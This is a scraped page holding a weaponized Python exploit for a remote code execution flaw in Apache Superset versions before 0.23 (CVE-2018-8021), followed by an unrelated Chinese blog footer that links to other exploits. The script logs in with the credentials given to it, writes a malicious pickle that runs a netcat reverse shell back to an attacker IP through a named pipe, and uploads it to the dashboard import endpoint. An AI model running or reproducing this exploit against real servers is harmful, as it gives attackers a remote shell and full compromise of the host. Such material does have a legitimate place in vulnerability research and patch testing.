# Exploit Title: Apache Superset < 0.23 - Remote Code Execution

# Date: 2018-05-17

# Exploit Author: David May (david.may@semanticbits.com)

# Vendor Homepage: https://superset.apache.org/

# Software Link: https://github.com/apache/incubator-superset

# Version: Any before 0.23

# Tested on: Ubuntu 18.04

# CVE-ID: CVE-2018-8021

# I originally disclosed this to the Apache Superset team back in May, and the fix had already been

# in place, but not backported. As far as I know, this is the first weaponized exploit for this CVE.

#!/usr/bin/env python

import sys

import os

from lxml import html

import requests

# Change these values to your TCP listener

myIP = '192.168.137.129'

myPort = ''

# Credentials must belong to user with 'can Import Dashboards on Superset' privilege

username = 'test'

password = 'test'

# Logic in case script arguments are not given

if len(sys.argv) < 3:

    print('Verify you have started a TCP listener on the specified IP and Port to receive the reverse shell...')

    print('Script Usage:')

    print('./supersetrce.py <superset server ip> <superset port>')

    sys.exit()

else:

    # Script arguments

    supersetIP = sys.argv[1]

    supersetPort = sys.argv[2]

    # Verify these URLs match your environment

    login_URL = 'http://' + supersetIP + ':' + supersetPort + '/login/'

    upload_URL = 'http://' + supersetIP + ':' + supersetPort + '/superset/import_dashboards'

    # Checks to see if file that we are going to write already exists in case this is run more than once

    if os.path.isfile('evil.pickle'):

        os.remove('evil.pickle')

    # Headers that we append to our POST requests

    headers_dict = {

        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',

        'DNT': '',

        'Connection': 'close',

        'Upgrade-Insecure-Requests': '',

    }

    # Creates evil pickle file and writes the reverse shell to it

    evilPickle = open('evil.pickle','w+')

    evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc ' + myIP + ' ' + myPort + ' 1>/tmp/backpipe\'\ntR.')

    evilPickle.close()

    # Start a session so we have persistent cookies

    session = requests.session()    

    # Grabs the Login page to parse it for its CSRF token

    login_page = session.get(login_URL)

    if login_page.status_code != 200:

        print('Login page not reached, verify URLs in script')

    login_tree = html.fromstring(login_page.content)

    csrf_token = login_tree.xpath('//input[@id="csrf_token"]/@value')

    # Form data that is sent in the POST request to Login page

    login_data = {

        'csrf_token' : csrf_token,

        'username' : username,

        'password' : password,

    }

    # Adds the Referer header for the login page

    headers_dict['Referer'] = login_URL

    # Logon action

    login = session.post(login_URL, headers=headers_dict, data=login_data)    

    # Grabs the Upload page to parse it for its CSRF token

    upload_page = session.get(upload_URL)

    if upload_page.status_code != 200:

        print('Upload page not reached, verify credentials and URLs in script')

    upload_tree = html.fromstring(upload_page.content)

    csrf_token = upload_tree.xpath('//input[@id="csrf_token"]/@value')

    # Adds the Referer header for the Upload page

    headers_dict['Referer'] = upload_URL

    # Upload action

    upload = session.post(upload_URL, headers=headers_dict, data={'csrf_token':csrf_token}, files={'file':('evil.pickle',open('evil.pickle','rb'),'application/octet-stream')})

    # Closes the session

    session.close()

    sys.exit()

[EXP]Apache Superset < 0.23 - Remote Code Execution的更多相关文章

  1. Apache / PHP 5.x Remote Code Execution Exploit

    测试方法: 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! /* Apache Magica by Kingcope */ /* gcc apache-magika.c -o ...

  2. [EXP]phpBB 3.2.3 - Remote Code Execution

    // All greets goes to RIPS Tech // Run this JS on Attachment Settings ACP page var plupload_salt = ' ...

  3. [EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution

    # Exploit Title: ThinkPHP .x < v5.0.23,v5.1.31 Remote Code Execution # Date: -- # Exploit Author: ...

  4. [我的CVE][CVE-2017-15708]Apache Synapse Remote Code Execution Vulnerability

    漏洞编号:CNVD-2017-36700 漏洞编号:CVE-2017-15708 漏洞分析:https://www.javasec.cn/index.php/archives/117/ [Apache ...

  5. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

  6. CVE-2014-6321 && MS14-066 Microsoft Schannel Remote Code Execution Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和 ...

  7. Tomcat put上传漏洞_CVE2017-12615( JSP Upload Bypass/Remote Code Execution)

    CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution) 一.漏洞原理 在windows服务器下,将readonly参数设 ...

  8. MyBB \inc\class_core.php <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 MyBB's unset_globals() function ca ...

  9. Roundcube 1.2.2 - Remote Code Execution

    本文简要记述一下Roundcube 1.2.2远程代码执行漏洞的复现过程. 漏洞利用条件 Roundcube必须配置成使用PHP的mail()函数(如果没有指定SMTP,则是默认开启) PHP的mai ...

随机推荐

  1. cdnbest独立主控配置自定义错误页面

    注:自定义错误的域名最好配置ssl,不配碰到有使用ssl的域名,错误码显示就会有问题 (1)登陆管理后台点区域列表-->配置-->错误url 解析一个域名到你的cdn主控,然后输入这个ur ...

  2. LAB2

    任务1: 效果:HelloWorld 好像完全按视频做就行了 学会了:把glassfish改好了,能跑 没学会:视频里的解说不懂在干嘛,得再看看 任务2 效果:intersetingpicture要求 ...

  3. 浏览器DOM事件触发

    除用户人为交互触发事件外,用js脚本触发事件的一般流程为 创建事件 var e = Event('event_name', {key: value, ...}) 分发事件到 event.target ...

  4. RHCS(概念篇)

    一. 什么是RHCS RHCS是Red Hat Cluster Suite的缩写,也就是红帽子集群套件,RHCS是一个能够提供高可用性.高可靠性.负载均衡.存储共享且经济廉价的集群工具集合,它将集群系 ...

  5. Admin注册和路由分发详解

    Admin注册和路由分发详解 1.启动 #autodiscover_modules('admin', register_to=site) 2.注册 1.单例对象 admin.site = AdminS ...

  6. eclipse中将一个项目作为library导入另一个项目中

    1. github上搜索viewpagerIndicator: https://github.com/JakeWharton/ViewPagerIndicator2. 下载zip包,解压,eclips ...

  7. redis安全删key脚本(模糊匹配,长list,大set等)

    两种情况: 1.删除指定前缀开头的rediskey ,扫描和删除过程中对线上无感知 2.删除一个大的list,set,zset,hash,这种得分批次减少大小,一直缩到0再删 第一种情况:只要知道线上 ...

  8. 搭建Fabric网络(四)运行网络

    启动网络 docker-compose -f docker-compose-cli.yaml up -d如果container cli关闭了,可以手动启动 docker start cli 设置环境变 ...

  9. [IBM][CLI Driver] SQL0270N 函数不受支持(原因码:"75")。 SQLSTATE=42997

    db2 update dbm cfg  using FEDERATED  yes 与 自动维护 (AUTO_MAINT) = ON 自动数据库备份 (AUTO_DB_BACKUP) = OFF 自动表 ...

  10. 图解HTTP第二章

    简单的 HTTP 协议 1>HTTP 协议用于客户端和服务器端之间的通信 HTTP 协议和 TCP/IP 协议族内的其他众多的协议相同,用于客户端和服务器之间的通信.请求访问文本或图像等资源的一 ...